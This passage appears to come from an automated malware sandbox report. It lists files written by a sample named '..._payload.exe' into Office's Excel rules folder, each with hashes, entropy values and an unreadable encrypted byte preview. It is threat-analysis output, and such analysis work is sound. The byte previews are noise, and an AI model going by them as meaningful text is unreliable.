                                                                                                                          Preview:<?xml.R.z....R.4.;...z.E.S.......K..`.._%%pU..<a..K........[..K7.7./.....\.Y......E......s..A..n....;...B...>\..e...Z.v..5.A.x.,0.....Z.....%S....)E..T,.....#.0f.....e.M..s.O.,.U..&..7z&g.tm....^.L`5.....^..}..t.?...&...N..EX..V......._./....<z..:.>`..Uj..L.."/W.K...g....2.5...O..(2..FW....(}l.{...)......I.r4..Y".|.D.M.*...L6}.S.H..R.s.Y.(n.XO...?...).`w.]u.#GG.\...E..3;.m.{Q.{.v._E?...[........xR(?.,.O).0A...-1.(;rT]w...Yi!+>{..=Z...mR...#my.B.3.k.C.b....;.....s..~n.>...],.....|......3..@.(.Bv.D..3....l.%..`......V)UZ..w.n'..).8OT...5!.....[......<..j./.[.......j....`...:-[....L`q[..-..ju..~.m"2..g.-H.q._].....,~.......m.m..}.0.?H.?|.C..l.!L.6L>..&..3x.......#.o;..D l.../........Gq.o.,b.=.....J.(...1&.uR.!.o.....<]....g.e.w..N..pl.Q...@R..&.<B.f[Y....F..v../2.....,hJ7 ...}....FZ...Y.v}.Pa.......K=.i.6......)..W...x.a..np.. .T..G....'.......7.e.......a..k..C+....3W0\..,...x5..`...C.-....M&C.h.c^.~..'/*_.S...,{...6...G4k....3

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68012v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1558
                                                                                                                          Entropy (8bit):7.888890084451655
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Y9VNqxVWR66rxC9cemf4HSjOpXZ2B6mDkA2DGlrbdygDDphgPms5/iibD:Y3NqxcR62CmgHxlUBkAtND7g+sRiwD
                                                                                                                          MD5:49FE639BB1CBD915282C7614426DF647
                                                                                                                          SHA1:68F1C6ED7D070F3171D503476F8AA050BFF7A1A6
                                                                                                                          SHA-256:BB95558F532DDAA7C2D09B9358033F3B37F9FD894188C06703569DE0845733D6
                                                                                                                          SHA-512:6FE0CB797E7EDD89817D97D4FF7500F8575069FF7954452E81923A9E4CCC7A83781A30F2F3F33D25D8EF31B95CFD08297C9A3E9A9918F709D34353E5B5268DFE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....q.2.~.`f.....O>%....x..Qs...F.O!......*.)$....|....c.b..$..!T..M....ea#|.z.^.l.l"b..F...If....6.......L..;pu<.L.H.9.M..1RR.`.}!0...}Gpdu..Y+$Zk.~.....)..$.....O.X.6.9yj...\S}........Y.x.p...b....Z..|......oCP...^'..h......iGo,....I..cq.n......... H.....HK.g.l.........cp....._.U..Ug.h...&.........UNo.../.DH.i...../L[......5.TU.....oZ.bQyq.=.$.c...h...."@....v.d`F.].9..\B...U..g..Kt`.~......p6~.MF.tHi.BS.....8e...+Y[..?...:7.H..K.......#............O.'.....B.S....D}..G..&.P.....9.uz>#SB.a....z*..D...QR-.E.2<.cj.~..f....{......i9.....gs.....c."...A.....>.m_>h.%.O.:..E...S.Fi.8=#n.}!#<.....=...JX'. .a6..@..I.........:..............D....[.U....M..FB...e..l.=......1.f.......0.D....U..."g........\".(.W7.u6....$~O......w.`...4..<U.I.*.....qR5>A...5....G.a.=^<...i...h1c......6...kiZ...?....$/b.....h5...E.r.x..(..5..0H....j...C.y.[..P.l.#.8.i.?G^.n.*....JG......E:...r..Z..K.....,....)A..O.T.e4...w.O...9...Ox....e....7...{n..N...l......d.=.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68013v9.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2251
                                                                                                                          Entropy (8bit):7.9084409886103355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:EOBQMwT0aGK9sPFME3/9YMJJOcfnaZPkbPmDeVgO1VLD:EJMw5Go+V3lvnOjMODuT5
                                                                                                                          MD5:5FF0881CC168C93EA4D14C5ADBFE5EB0
                                                                                                                          SHA1:E5C25D6F25DF16D1CD4D5CF8AD8B7F9C9F572856
                                                                                                                          SHA-256:4C6E851AE23E8968CE77C3ABCC135B372FADA7BAB919573FFC86182EC2A1EAE8
                                                                                                                          SHA-512:3E8EF2599F7433814952D133FF07BD615343FDCBEE016D7594E3E3A3DA946E39E54EF8766CA5106B4C2484943FC03B53751990986ADB41C49B0EF622C1636295
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml9hkP.m4(.7..6......../..y.z....q./...<L.$:..7..V`.......cY.s3...<...M.jv..^N~.NV.K(eN...I4X#.>..-./-w..?....Ed.){.\.r......r/..*.T......M..2.Sy.j..I..)9d.F7.....:8>.bK....d~...Sy..VS..M.#.W'.p....]R<c.d..8Z....;.uY....x..6...ym.....'....W.i_f.,|[d.s.y.o.b..5.ph.......J.../5.x.[.3..=..p.u.,....2I]g.........yo.QtFF. 1.n.3.wti.....ewn...`.,................J......J.<c.:.C9.h.T..."o.(..f.K..JXt`.g.qD.\KS.#...5R:......Vb.x./.X..^E...k(.p7...n].....]+c..U..SoCwn.Gj...g&@..;-....S.....9...=D0c.P).iY..2...I+.Y...q..^.I...].;......@...aa...Y.. .-...b............y E.$ve.....y.W....q..7..l.......u.......5:S..;._1-9....<.m`...SH..=.#...O...E..B..Y.........R...8K6aC7L....d ..E=8......rE.=p.A..-(..,.N..Z..)..._......<r.5..D....lv..4.d...H`....dHu...b/.V".....<~..Y.%.U.Xi....Y3......S.}Ga.s.._5:pr.6+..$..i.3f..BM.../....tL......[.. 9...s+.m..m.9UI]...2B...2.G...Lzc...H\./..hET.../...0..I....{._...I.....r......@..6.@6.t.?.o.>ksV`.Y'w...h.y4....-W)...d1/.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68014v8.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1826
                                                                                                                          Entropy (8bit):7.890990818129358
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:gSq6ek0jHTIewg8AwOvQqA+b5w1CcOMXavAPvMh3iS5aTD:grE0jzfw/ADV5w1CBFCvMh3iSy
                                                                                                                          MD5:557176AD27AD710FA13DA08087043A75
                                                                                                                          SHA1:746D376806EEABAF416D2C8A5FB58CBF443CC21F
                                                                                                                          SHA-256:ABAB2E4CD2F89D7F3C3EB1617BB59F5A38B28219731F523B5DF40741BC94C781
                                                                                                                          SHA-512:30DE32881118C4D75B06B99733317DFE30667923A32FACB08AED5F2E0FF22328088748851FAC417FAA9FB9B259C442E00CD2E545536089132A1B4D1FE55D54B7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.R`i".g#.A..^,@....<...s..mA..h......J...HTT...,.&.D8+...Y....._.5..P..:r..(...../-..#.(@.....@.:T.?`..../{......^.$&.Fks...w..........o......,^.6*.....:..N.2=+..Z..U.^,..q...o~..{xk.s...bd.{.v6.>.U.x.;.~c....8 M~...(.?n7..1.0[..g..pz.J.IR..f.../....6.+..~..Z.G8 .a9W.gVJ|z....U...W.....6z.Xk^..9z....~E...s.[4X....TH'J....5...qs...p50._....61...+..n..su...Y.;...e&...g.;>x.....g{.C#"..........0..X{.b..y..t#.^.....R...H.?(;.........)..z..?...Iv.. ..p............$.aM.e..#[....P....y.M..i.}) ..\......&.Ek.. .s4....4.<..9.p..S......uw...u...q..4...h$..S..B.*[.m.......k..Uw.Z|Nd1.\.....@`.....v....,.....i.....[&..f...f(..1.H.*q.......I..Q.M.e........./<J.E%..%W1.........f...'......7........k.I...]..IW.N.]..S...^.u..;.e............,"........[v8.....a..e..2U.Y..}p.A7e..2.d..%XJ.......[.5..,..k.8._...l.58......^....R..j.=...0.F..uE..d,...6.e~yP.....({.^...g..m4.$...[.d...%.a.v.hh...To..&.....b.I....P}.].....>......X...b...].z]..KtU7...X.....8.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68015v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1197
                                                                                                                          Entropy (8bit):7.84365422712083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:fBogl0TxCHkzSSq+Ro0G5aNgZE/d3pnNCaQwzPhkWbUat8kuK3OBbD:fGgl0TaS9GENgZE/RuGPCuGMeRD
                                                                                                                          MD5:0BD8F3B47CA0A28CFCC2CCCA921D8ED0
                                                                                                                          SHA1:9D930C0A57588976D9D761A1402850A03C429FEE
                                                                                                                          SHA-256:B2FD5462A547A4CFF035A863A1CC61257A42F1AF4A762F92B0C2F950F67035D3
                                                                                                                          SHA-512:4CF53B1CC64429D3135C010DC583D8A3625F88CCBC8314C9EB2CFB90FDB182BCBA7D3A27157FBA96845DB225CE3ADB6FDDE553B3E88AC355439EA46D007E338B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml6.n7.`..^...].k.}S...G..........Ey..C.b.|W~...p\....eE..x..h..V.=&..m...*VX.`]S.`.6.b.......aU*.g..Eich.......P[.AA..=......;.....Z$w.T.1.......`.xT.4.....,..6......f...o.%f..u......Z.....H...3a.`......_."Yl&w.ge.......T..>.......b.v.#.._.......A.w...].%...g..g.e.*.zH.n..|tW.[....U..dyWT._............-}.i1Aw.W...;..1..v.1...z.m..^..s..v.....t.......y.BK..K.|..v..C.....5H.k..%..4.b...\.....3.'t...p..<.6e.?..P...(.G#.....XT.}(~.e...M...~P]!.k..d@.AD.+..:.{...ppioZ'..B/.8{..$.}....4..LM.K1...+.=..G..Rg..m...X.i.0.C.!.....Lw.o,.Q.........Y.L....~..>C.3..E.,w....Q.)...R.....(......^.6.hP.;..P&.N.F;..8.S....W..k..K._..}G...B2.......W+.?...ykD.B...s......az.lW]}t.0.~..U8=...-*.. ....Em4...8&...4M..Z......eQ.!~..!-.![b`>..O.:G...>Ph."..f....i....M>#..j..J...vq.e......0Vl./\.&.g..k22.....}l...$G.5...c..2......16..........s...11.....-..b.+v..&.`iG....z."...,P.l...j.^.l.S...U..k....../g,o..'.wwpL....f.t..d.l!.]K.6...<..k..\..;...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68016v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1004
                                                                                                                          Entropy (8bit):7.793556440401948
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:RkM6ZuL5/OUSpE36n1h5DmqF/t2AFupg6BmwbD:RkMQU/OUZ6n5DmQ12gup5D
                                                                                                                          MD5:64E301E958451E9D01271027DC81194F
                                                                                                                          SHA1:ED1BE8209B670051557BCB699C2A74196704E7FE
                                                                                                                          SHA-256:DDA2676320B81A2C2CB4AF3D3AA3FB7289E624478276E3120971C8EA35B329D2
                                                                                                                          SHA-512:F5AEE6292E99F9A3CA737278F5FC9251ACE32BC75F7DBC38AA6428D425F1E191562E7E29808FAFDF2761BC4138157DB58B300DBC1CE4BC3457DF15BC0991FAF4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....x.....^..Z.J.9.lHW.3l.&J..R...e.mv..R.pf.+....P.U.p.m.^.B+..k...PHN.4Y.#.y..?.).U`...A.A....]iRXz..... .&{A.#wlVF...s.Q.J/.....EH.\............ol7....r.=.E...n..>&c..lA%.....h..%%k_...?...r..].`c..+...z..!&.......;.....n8.4.......=.p..L.W...V..9..a!..8.k.QR.p4.Q.......[_.....U...,..8;....J.~O.N..[.]..r^<.#..M..V....L.......R....\R.N.7.V=...`>..0..(...J.p!......".b.r...REh..lrY..*3...]K_<....Fh..3..42-U\...j../...N...@ ....B=...~9N..Dh.dc......3....C.{5|.f.B...)Ho.Ez.v"..<..8...G..,..E.....9...z.{.:*..P..b..po...G..[.../[......=....~..@N..+..7.E..y..*dS......H;...a.a.....I...3uvg}Y.b.i.+7..We;......8..D..2...`..........!F..a|..D...Ml..I7..y.X......AW....k7..OM..#p6..@.!.S....E.!....../..;....?...v"...@.`..Z..X..q.T...8.+oc.<Eb.K.0.KW..[..M.8.(..y....5.H............-=.SUZ.L..H5.L..>.c[.........k.,..0;S.]..).k.)..s. 1..vc[.N..sM..q.M-<.H...S%..km..X&.K."I..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68017v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1186
                                                                                                                          Entropy (8bit):7.807767900754913
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:fdWVgsG6asirVNHq95yd5RtQsz3PF5agkZKt8mqZch3yCVbMTbD:UVnG7sirVN6sRtL3PF5sWRd4D
                                                                                                                          MD5:6F0420445C17F28020D214987DCE5545
                                                                                                                          SHA1:A7E0CB698C98DC7AB9DBA86B8F94966BA4C9F3FE
                                                                                                                          SHA-256:CBED9875F5B12AD1D9ABB988AFE4427C70A5EA828D1A62EC8067721DC3ABC02C
                                                                                                                          SHA-512:488F5196C95C5F5643B3205F0FC1ED4BDD7CC2425098D587FBF3498C3A69EC63BCE483555D1A90A23FD1E5DBC9127B929DF41D7C9C11860FA5226B5F1421F94F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.p-.s..cm.s..}..jF...-...6..g...}..)BDp.U....:.SS.a....1..H.Tz...e..7W.m.p.s...Q..].EmP..$..MB$..p.>..|....Q.TP.p.{..R`.....+C./...z|..O`.v..9...R.J..(.,.Z]. 6.....#.mI.P3u....r..~.(...|m66.&..u.....}.f.|....n.>.../.k.....l.8X.7.....2........J-\8nU`<....f..6....... ....~}f.1..#....%LW.....L...........c...<m.C@Jt. .3..{..B..guH:s..i.C.mz.o.:.\2......_.....I#.R.6....2.Y|C7*..$.........T....SdC..<.......r....R=)&....@.6..(.b.r.x.-M..j.d.?.&.U.>.6.'}+y.?*.X|.Y`..u.J_......B....B...].w..,s...'...-kYG^..O)....5..?....`.Y5c.f...yCf..:...R...l..7...j..c|....?A.S.&.....}i.S....{).TK.X..5R.g...]>.8n.S.#14...:l)e..Cs...0.FX.u{f.7..e..?...M......$...a.Y?sv..U..g....2<.....m4rW......~..:(........'...,j:w....'n.....,.N...|.....B.9...."..%...n:.N......3..Z..m."..}..M...n.}. ^....R.'.L&9.R.}~S.....4G1..cjk...*.1.j<.U.Q,....09...r.l..T...$.9.#..._.B '.T+..c.....(..r. ....#...L.:....N.fd..).s.^y..]r..c.L.z..\.a...CY...._..TV.o..z(...Z.Q.2...q.5..q..P...$..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68018v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1291
                                                                                                                          Entropy (8bit):7.8310982337206765
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:S0YlqR+2bLFzrTmXLEfBVduoa2FJDRkaIaL6BG9as3OGin+sPKngbD:FIqoI9fiLEfv0ilRklbGeGC+sCn6D
                                                                                                                          MD5:65835390EDB3F608F633A9761A5F5E1C
                                                                                                                          SHA1:8E580271FED715E0D18F7EF48D6B4CBF86772066
                                                                                                                          SHA-256:EDB1769AA8117AB87848467EDD3EA89389314988960B664BFA6E4B672397E4CC
                                                                                                                          SHA-512:8A72AA6F58BBAC8CB99830425BDD51E4697BF801EE89151DF34B07A51CB235637B97E4170B2CDD33D450A55D83B33B8F7BEC10583E5CC0942C18C86A5F2516C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlk....j......U.jT,.L|...P9.W.V.s..G..g...:7...M.bb..*...51.|..@N...B.6.....;%..Z...x......|&..,X..N........fM).~....'..~...,..GZ.."...z....qg......D.5.....f.r.-K~ER?[B.:..D.{T.6..3%<..A.5.}.....4%n.............:.@9.O......r.zg.@.9...g...V ...!..P..E../..R.X.r%`;..... ..z)..Wq:V.q...a.O..P..h.......^..v.{nK.}..}.".......}V..q.3.....C..j4>.w....q.PoW!...8.y.\.3.B....h...@.#.7..$R0.Z.^TPk.V....<y.`........f...n........>....._V.\...L.!H...3.u.#...z.s.....h....R...P. .`.9...~M.x.U5[....O..`.a.P..v].#4.n..(.=....d..M...........#IW.-CZ...~.@<.i..,.6Y..._.xI.-...l?aP.e...,.#h..p.1h.LE..J..s.$..b..;..b.;3q.;..;...............iHdl...V.........T ..;..c9(.7]>..#.2L...M........ay.._..kC..=`.7.........."....b.....'.."....f@.d:.gVH....Lwr....."&..eIj.+.B.~.o...........@.. .7nk..J..9.L......y........%?m.3CTO...m.&..}.m_v.m.af.$.X.....l..Hu...NBjW.R..2$?..GL@`e....N...E...3o.....O..L.$....*..%..c,+/^.Fa.P...+F.UU..J*%{.-.4-...4.G../.Q..l.o........ ..IZ.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68019v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.892934761571053
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:yI7ipLhSJPP60Qv4KCYXS91UaEJtle8+C+84n7PtrAGD:yI8tStjgdS91tbv59JV
                                                                                                                          MD5:8D5166C0CF8861E57A746BC49052D921
                                                                                                                          SHA1:C3FD2CEB3B1655353C4E0E3F1303F52241D73A62
                                                                                                                          SHA-256:3138E3B6091946BAFB5B722A307B561838D02968EB287B62BA1300A5C2A4E2AD
                                                                                                                          SHA-512:B84023DEB5D71994814E361B94035ADC4518F2572B0846CA4EDCBA17B92B2E97420C5149CABE6795FB95FB9BE9B2490991204AD98EF7B12A580F4DD2FF727230
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml._.Y6.L..7....O...c.......L/..r.0..4.U.....k.c..*.8qU..X..N...........6n.:..8..c.E...%.S...6yv..[r<d0.#..F..+.Z.s.H...&<.-J.QR.../...?.N...r.k.n.Dv.p...h..7..A.......<..c...f.....$6.15;LX.....Lz8.:+...&.FtW..f,2.F....>...e.s...._..Y..cT.....}>..bwT.p......s..=P#.$GM..RH...........d2..HW..i.G..l.>.*.s.....`...C.&...!en0...y..W._........m.....i2Q...L.K......IM.U...S..3.^I..\3.be.N.=.)#...f.]......C(....N......{..q..F.M......!G<..$Xl..].........>.-.......3..r._..8K.....Z.#..b.s.n..i;...1.7.6 V.J...}........ ...w.k(..........C&%.....6.1.au.YA..9>..f.J[."...f`.J..JE..KQ...4....[u8%.'...q.c.8qB1.K.nFg..`..F..wK.....M...$.Z.....;.JC.3@..5.'.Zc.xvu........f<...(U....A.{=.I...B).vu..t.h..a2.c9...o..+..?.v..!._...!...~...zESx..VA..t...a;..|.k{...........x..C..j...[..+....;.!..g ......P..A&....5.... f..H..A$P^..v....q..B...=....d.n{.}~....5`.....k..h.ak..a.......|.....^g.SF`(...[{~..M..9..v.g.Vd.p.....W...d....)......=./z...C.P1,7.M......Ah..D.}...Yx..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68020v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1354
                                                                                                                          Entropy (8bit):7.844119325524764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:LNFswW/+bXZAi0MTdBkt6SE2nrU0Y43LffO+qYnCIJ2qWnoU3sel0FbbD:LNFsy0Sg6SE2nPYNvM2LuD
                                                                                                                          MD5:4ECCB51FF88085758F86C41569C8B1F7
                                                                                                                          SHA1:6A49F5EE64989CDA384174FA3A768219357F5EA3
                                                                                                                          SHA-256:C35CAB18808099AA0205BAC6E062A91D4D1C08778B6AD77211AF7D88104488FA
                                                                                                                          SHA-512:BEAC15D58B3C545206B7C71A336BEABB7FF05EB1CCC9BC7BD3D154DB3A12B00454DF67F14D38558AE166AE46DFC3BC78085CD45DEE26BB8DBABEEB284B4BB264
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.- ..~M.....o._.j......$G.....5.8...b...~.G.c..3...`.q..XC},.\..../.s...a.%.e+G.....g.g..4.ze.N..N..O....Y!/.q..$. C.R.7MJ.....xJ.%.,M.[p0...*...c....g...6.P].DTLF(..c....6D....=.-e/.;G."...*...K.+.xh.b~".\.X...m...2I.%K..!..U.........k.}s45.lx.'....`\.....9.D.H......I...d.].u...jQ.....=..K..L.l..D.....df.#.....#..].h'..s.AB...v.Kr.k..M.......h.h^..RO...s..ns3.....$\...aq{.".@..yr.....3).>.Z".....s/...4<....d<....7.......X.H..s....3_+...dH-2!...e:C.....v.m...v.</.@...i.:.M.......%I......./......66a....j..o.............?..8.d,...?.@....F..C.X...X.'.j>.7..il..}e..).\.x.3.m.k.Q.r.,A....G..TN..aH.w.FHt.]....}....I..........+..t..78r(.u.J....EUs+7A...0.<$^...EG..=|L.n&..V....8....-0..zzUH.......>.3....K-.f.OC0^3........B..^}:.....w....sr..+.=YC'...TB.5.....`..ajL~.....1J)d9/.k....Yb.9$.......I.....f..#.......$.Kl....O.I......^.j..T]. 4%-...P.....i`.......$.............0......../k.w...c1H..1f......).....#..-...s.&....g..K.....Me.*.M.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68022v8.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1864
                                                                                                                          Entropy (8bit):7.898362959996536
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:FnY9NXZ3ks6gDuYmL3YUxqdBicNGBLUxA8Lj8D:pY9NXZ3ks6NYK33xqdBnNkLrGM
                                                                                                                          MD5:A5ED9B389BD42D6E4E8EFE03C516FE40
                                                                                                                          SHA1:7BE786D2DFCCD9F030E728F1F631C6D8952224EE
                                                                                                                          SHA-256:57616353F6CAAF61EEAC896C81F27885C930FC1CD83FBB0B70871687C24C738D
                                                                                                                          SHA-512:D759C3548C101A89BF536406D7376922A14146B637BF10B61CFBA8CFAE157C7687D3A5FE718B903C5D3C21B0CDDAC23A1A4144C8236AF9FA33731831AC579F8C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml5.......i...@."....R$..`P...W}4.TR..w..,....v (.v..u.Zg;.=p8A.%R. .4..Q.....Re1.9..D..v..=H...OT-.^k.4.`...R.....|......y....|h.`.NR...Zim.l,..3w.t..{l5Zt1......o.z.!.%...w.].6yk.....z.w..,n......4.yRq.-\.}.{35^=0..Y`..^..'...l..X...D<..]6){..S.,...........&......d."x..ek.V._.'.LC..n....Z...~.gy._C.:W>g+.....p....!P.....G[.=H)a.n...QG.Vz..=.F.x..0q..3].Vv.se.AEp..R..*-ZC..........0.........\./.1...K....._............6.M.......t/...|.W*0I..W^.@..T...Ih.Ge..,..w...j............7$e.!.L..l..[.,.=...~.X...<....dw...Y..+..@....#.8".....7'..'.e...|.,B...+..!Y............J....^.Mb..xC.'....m..G<...._.]........3:.W.......VZQ....[............U.I.pF......o...'.'...\X.E...b../G...3... ....f.:..d.U...@x..zf;.&......T..p..Z-...{....C.(e.2V..j7..'(..[....i........M....k...M..<.4]..n./qR.....L../I.h^!y.3.#..S=....;..rlq..z.;j..@@..E..n..G...PWt.W..../fd.j..U.N..-...p'p49uh.......8.....Vt..>..v..Z.D.......!..D.e...>=...`.T)@.l..A.[.t..2U..4.......q

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68023v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1509
                                                                                                                          Entropy (8bit):7.86560830780274
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ic5h0WQUkJq6oOYX1CxnHKRLpDp1bsZKRdD7ZwEz1IhQqpeUqtBspJR3WH1+pG4S:Pb0YqJBGcHKDDkZK3Lz1VqfDJR3WHeGl
                                                                                                                          MD5:58A29F88A36EB89DB111D85C88582081
                                                                                                                          SHA1:0D7297846B56777DBB17D7DCFFB97A974E0B8520
                                                                                                                          SHA-256:ADE59F8887D08F05A8955B8045CD186F287F5038277AA927E975B3B8C6C8602B
                                                                                                                          SHA-512:864BEC1A8704A7901C3E8186D6F526F2CAF5F8304BDB5445C944A21DE4EFE08FCEEF079C86AAA9C2B2CE401F29C5639C63E75B909FA9D88A8146C4232DFAE76E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.AS'.e......>...2Y......O....+.6.>8..{L...<f.|f..q.Z^..l.D%..x..Z......BVU`B..,..i.mx...w..........p.b?.x.|..Ki.s.N$O..bK....vnz..q.f..e."..=&.U.?.....Ps...*X..7....r.\0.F..&...-..&..+8.=Mg.....*...M.e.S...U.#..!.......T..{.bU..wtw....V.Z.....Ps}..w....r....(...*.q..Y.D.kj.........6]..m*.R.k......0&iw^.ZP|....HC.Z.....k..D8J.P.=._.B.Qtj.|...&.?.?..=|.l..\.l[..#....V....C........P..8..|.L.tV\U..9.Jbe..Ay.Mb.."....v.M*...}...euZ^.sU9%......}.3.,.[...S.'..d.Y._..j.'.....-n+....K)...H.:.8..^*...l..V.l.i[...+m...10....k.$^8.]H....g.n...1... .........{;.`nA1s...-.o....D8.&Qf...e.....1....v...a.....ZQ....,fl.:wK....<.Z.+..;x(..f..@.Y......B..........F...Di..<"".;..@...P.W&8If._.YN..=.K...P.s.F..=.z...4..l..]`..z.Z`.};.vu.v..m.7.......M.vcQ.z...B.=....`.....bP..<.$6{v..P.....Z..OY.. ...e/.%|<&.p.1.<G...p....L..h*..T.2...{.{'q.....t...\*I...;.a..2...~\0...cM.c..4LY..`Z.(z7"j|..1../.P,....c].;..o1...~..{h...p$mC+.T..vl.v..8..........6..n.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68024v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2007
                                                                                                                          Entropy (8bit):7.892385804509339
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:KNP8uCM2nepHRSUqutjBQdZ4iRE6R3CH1oG8ZzVVnZeMyBD:XTDUquG4L6ZKoGmzVuH
                                                                                                                          MD5:229633C3FE7154730338B5E9252F5B52
                                                                                                                          SHA1:B928086FCC2BC2FE9253091AD76C631A387A5D69
                                                                                                                          SHA-256:D3BD531EF0D4693B52D27778E6253EA21F2B26A62E1701F86CE696A0A92610C6
                                                                                                                          SHA-512:70D86A38C3527B41A93262A4FF09C5EAD725FCE7CB4727AAF9B791FD8A5A1B9FB96E4BFDF117CD49BDEF7AFAD10D7BAC69442C057CECF0C9EF0C6233934B6FB7
                                                                                                                          Malicious:false
